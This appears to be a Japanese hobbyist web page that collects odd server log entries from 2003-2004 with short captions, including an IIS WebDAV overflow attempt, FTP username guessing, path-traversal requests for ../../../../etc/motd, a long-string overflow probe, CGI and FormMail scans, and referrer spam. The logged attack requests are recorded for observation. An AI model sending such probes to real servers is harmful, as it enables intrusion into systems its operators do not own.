    68.78.160.239 - - [07/Apr/2004:16:48:29 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x02
    213.156.52.112 - - [20/Apr/2004:10:44:14 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x0
    219.140.141.179 - - [23/Apr/2004:20:39:00 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x
    133.205.24.230 - - [03/May/2004:10:34:26 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x0
    133.205.44.134 - - [04/May/2004:20:40:38 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x0
    133.62.173.180 - - [10/May/2004:12:19:08 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x0
    

    IIS WebDAV を狙った攻撃 

    218.66.213.215 - - [04/Apr/2004:23:31:43 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02
    

    Webalizer を利用した検索エンジンスパム?(3) 

    212.88.134.90 - - [27/Mar/2004:04:52:12 +0900] "GET /%7Eppp/usage/usage_200403.html HTTP/1.1" 200 32768 "http://www.dreamphentermine.com/" "Mozilla/4.0 (compatible; MSIE 4.01; CS 2000; Windows 95)" 
    63.227.61.66 - - [27/Mar/2004:04:52:22 +0900] "GET /~ppp/usage/usage_200403.html HTTP/1.0" 200 0 "http://www.dreamphentermine.com/" "Mozilla/4.0 (compatible; MSIE 4.01; MSN 2.5; Windows 98)"
    

    dc.tickerbar.net 

    61.236.38.2 - - [19/Mar/2004:12:52:23 +0900] "GET http://dc.tickerbar.net/tld/pxy.m?nc=11794792 HTTP/1.0" 404 281 "-" "-" 
    

    危険そうなアカウントをひたすら探す攻撃 

    Mar 21 08:03:22 myhost ftpd[22652]: FTPD: connection from dsl-200-95-5-189.prod-infinitum. at Sun Mar 21 08:03:22 2004
    Mar 21 08:03:22 myhost ftpd[22652]: <--- 220 
    Mar 21 08:03:22 myhost ftpd[22652]: myhost FTP server () ready.
    Mar 21 08:03:22 myhost ftpd[22652]: FTPD: command: USER zxcvb^M
    Mar 21 08:03:22 myhost ftpd[22652]: <--- 331 
    Mar 21 08:03:22 myhost ftpd[22652]: Password required for zxcvb.
    Mar 21 08:03:23 myhost ftpd[22652]: FTPD: command: PASS 
    Mar 21 08:03:23 myhost ftpd[22652]: <--- 530 
    Mar 21 08:03:23 myhost ftpd[22652]: Login incorrect.
    Mar 21 08:03:23 myhost ftpd[22652]: FTPD: command: QUIT^M
    Mar 21 08:03:23 myhost ftpd[22652]: <--- 221 
    Mar 21 08:03:23 myhost ftpd[22652]: Goodbye.
    

    ない物ねだり(2) 

    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /gdb/images/gdbhome.gif HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/page_back.gif HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /css/atcc.css HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/Background/top.gif HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/Logo/logo.gif HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/top_slogan.gif HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/top_search2.gif HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    150.67.72.17 - - [09/Mar/2004:19:10:58 +0900] "GET /images/clearpix.gif HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; istb 702)"
    

    ない物ねだり 

    65.214.36.159 - - [09/Mar/2004:10:01:53 +0900] "GET /japanese/super-toto-plus%2Cnet/index.html HTTP/1.0" 404 311 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
    65.214.36.159 - - [09/Mar/2004:10:02:14 +0900] "GET /japanese/%E3%82%B2%E3%83%BC%E3%83%A0%2Cfun/index.html HTTP/1.0" 404 305 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
    65.214.36.159 - - [09/Mar/2004:10:02:35 +0900] "GET /japanese/bicycle-basket%2C%E8%B3%AD%E3%81%91%E4%BA%8B/index.html HTTP/1.0" 404 316 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
    65.214.36.159 - - [09/Mar/2004:10:02:56 +0900] "GET /japanese/super-toto-plus%2Cnet/888%2Ccomputer%2Cgamling.html HTTP/1.0" 404 326 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)"
    

    こんなユーザ名はやめよう 

    Feb 16 02:25:42 myhosst ftpd[26771]: FTPD: connection from 61.78.53.54 at Mon Feb 16 02:25:42 2004
    Feb 16 02:25:42 myhosst ftpd[26771]: <--- 220 
    Feb 16 02:25:42 myhosst ftpd[26771]: myhosst FTP server () ready.
    Feb 16 02:25:43 myhosst ftpd[26771]: FTPD: command: USER upload^M
    Feb 16 02:25:43 myhosst ftpd[26771]: <--- 331 
    Feb 16 02:25:43 myhosst ftpd[26771]: Password required for upload.
    Feb 16 02:25:43 myhosst ftpd[26771]: FTPD: command: PASS 
    Feb 16 02:25:43 myhosst ftpd[26771]: <--- 530 
    Feb 16 02:25:43 myhosst ftpd[26771]: Login incorrect.
    Feb 16 02:25:43 myhosst ftpd[26771]: FTPD: command: USER up^M
    Feb 16 02:25:43 myhosst ftpd[26771]: <--- 331 
    Feb 16 02:25:43 myhosst ftpd[26771]: Password required for up.
    Feb 16 02:25:44 myhosst ftpd[26771]: FTPD: command: PASS 
    Feb 16 02:25:44 myhosst ftpd[26771]: <--- 530 
    Feb 16 02:25:44 myhosst ftpd[26771]: Login incorrect.
    Feb 16 02:25:44 myhosst ftpd[26771]: FTPD: command: USER test^M
    Feb 16 02:25:44 myhosst ftpd[26771]: <--- 331 
    Feb 16 02:25:44 myhosst ftpd[26771]: Password required for test.
    Feb 16 02:25:45 myhosst ftpd[26771]: FTPD: command: PASS 
    Feb 16 02:25:45 myhosst ftpd[26771]: <--- 530 
    Feb 16 02:25:45 myhosst ftpd[26771]: Login incorrect.
    Feb 16 02:25:45 myhosst ftpd[26771]: test (bogus) LOGIN FAILED [from 61.78.53.54]
    Feb 16 02:25:46 myhosst ftpd[26773]: FTPD: connection from 61.78.53.54 at Mon Feb 16 02:25:46 2004
    Feb 16 02:25:46 myhosst ftpd[26773]: <--- 220 
    Feb 16 02:25:46 myhosst ftpd[26773]: myhosst FTP server () ready.
    Feb 16 02:25:46 myhosst ftpd[26773]: FTPD: command: USER movieup^M
    

    80番ポートに対する典型的な攻撃 

    24.117.251.37 - - [12/Feb/2004:13:22:20 +0900] "GET /cgi-bin/lame.cgi?file=../../../../etc/motd HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901"
    24.117.251.37 - - [12/Feb/2004:13:23:47 +0900] "GET /cgi-bin/php.cgi?file=../../../../etc/motd HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901" 
    24.117.251.37 - - [12/Feb/2004:13:24:44 +0900] "GET /cgi-bin/bad.cgi?file=../../../../etc/motd HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901" 
    24.117.251.37 - - [12/Feb/2004:13:25:05 +0900] "GET /cgi-bin/passwd.cgi?file=../../../../etc/motd HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901"
    24.117.251.37 - - [12/Feb/2004:13:27:43 +0900] "GET /cgi-bin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2.1) Gecko/20010901" 
    

    スキャンスクリプト 

    216.12.210.209 - - [15/Jan/2004:16:53:46 +0900] "GET /cgi-shl/ HTTP/1.0" 404 280 "-" "-"
    216.12.210.209 - - [15/Jan/2004:16:53:46 +0900] "GET /cgi-bin/ HTTP/1.0" 403 284 "-" "-"
    216.12.210.209 - - [15/Jan/2004:16:53:46 +0900] "GET /cgi-win/ HTTP/1.0" 404 280 "-" "-"
    216.12.210.209 - - [15/Jan/2004:16:53:47 +0900] "GET /cgi-dos/ HTTP/1.0" 404 280 "-" "-"
    

    FTPにそんなことされても・・・ 

    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: GET http://www.s3.com HTTP/1.1^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: 'GET http://www.s3.com HTTP/1.1': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: Host: www.s3.com^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: 'HOST: www.s3.com': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: Accept: */*^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: 'ACCEPT: */*': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: Pragma: no-cache^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: 'PRAGMA: no-cache': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: User-Agent: ProxyHunter^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: 'USER-AGENT: ProxyHunter': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: FTPD: command: ^M
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 500 
    Jan 14 10:26:47 myhost ftpd[20839]: '': command not understood.
    Jan 14 10:26:47 myhost ftpd[20839]: <--- 221 
    Jan 14 10:26:47 myhost ftpd[20839]: You could at least say goodbye.
    

    こんな検索ワードで探さないでください 

    EATcf-527p109.ppp15.odn.ne.jp - - [10/Jan/2004:00:57:24 +0900] "GET /diary_2001/200104.html HTTP/1.0" 200 11315 "http://search.naver.co.jp/search.naver?where=web&query=しかたなく+3P+友達" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; istb 644; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
    

    mail.cgi 

    12.38.79.66 - - [07/Jan/2004:17:06:47 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://spock.genes.nig.ac.jp" "Mozilla/4.06 (Win95; I)"
    12.38.79.66 - - [07/Jan/2004:17:06:47 +0900] "POST /cgi-bin/Mail.cgi HTTP/1.0" 404 288 "http://spock.genes.nig.ac.jp" "Mozilla/4.06 (Win95; I)" 
    12.38.79.66 - - [07/Jan/2004:17:06:47 +0900] "POST /cgi-bin/FormMail.cgi HTTP/1.0" 404 292 "http://spock.genes.nig.ac.jp" "Mozilla/4.06 (Win95; I)"
    12.38.79.66 - - [07/Jan/2004:17:06:47 +0900] "POST /cgi-bin/mail.cgi HTTP/1.0" 404 288 "http://spock.genes.nig.ac.jp" "Mozilla/4.06 (Win95; I)"
    12.38.79.66 - - [07/Jan/2004:17:06:50 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292 "http://spock.genes.nig.ac.jp" "Mozilla/4.06 (Win95; I)"
    

    "LINK / HTTP/1.1" 

    163.152.159.70 - - [05/Jan/2004:17:41:42 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" 
    163.152.159.70 - - [05/Jan/2004:17:41:42 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" 
    163.152.159.70 - - [05/Jan/2004:17:42:29 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
    163.152.159.70 - - [05/Jan/2004:17:42:39 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
    

    "OPTIONS / HTTP/1.1" 

    192.192.90.241 - - [05/Jan/2004:05:13:32 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
    192.192.90.241 - - [05/Jan/2004:05:14:38 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
    192.192.90.241 - - [05/Jan/2004:05:16:02 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
    192.192.90.241 - - [05/Jan/2004:05:17:44 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
    

    referrer に "377" 

    218.227.26.127 - - [05/Dec/2003:16:49:48 +0900] "GET /~ppp/pppdoc-j.html onmousedown=\"return clk(913,this)\" HTTP/1.1" 400 377 "-" "-"
    218.227.26.127 - - [05/Dec/2003:16:52:44 +0900] "GET /~ppp/pppdoc-j.html onmousedown=\"return clk(913,this)\" HTTP/1.1" 400 377 "-" "-"
    218.227.26.127 - - [05/Dec/2003:16:56:37 +0900] "GET /~ppp/pppdoc-j.html onmousedown=\"return clk(913,this)\" HTTP/1.1" 400 377 "-" "-"
    

    逆アクセスログランキングを狙った検索エンジンスパム(2) 

    64.239.138.76 - - [25/Dec/2003:04:52:10 +0900] "GET / HTTP/1.1" 200 1427 "backlinks.seguru.net/?link-popularity" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.2.19; i686)"
    
    % grep 64.239.138.76 2003.12.* 2004.01.* | wc
         134    2546   28218
    % grep 66.250.131.50 2003.12.* 2004.01.* | wc
        6869  137380 1286650
    

    迷子のinktomi 

    j3102.inktomisearch.com - - [03/Jan/2004:03:29:02 +0900] "GET /asian-women-singles/pwcollect/lesbiean-thornton.htm HTTP/1.0" 302 210 "-" "Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)"
    


    I&U Home > うにまま(仮) ・  謎ログの友 ・  パスワードコレクション ・  FormMail Scanners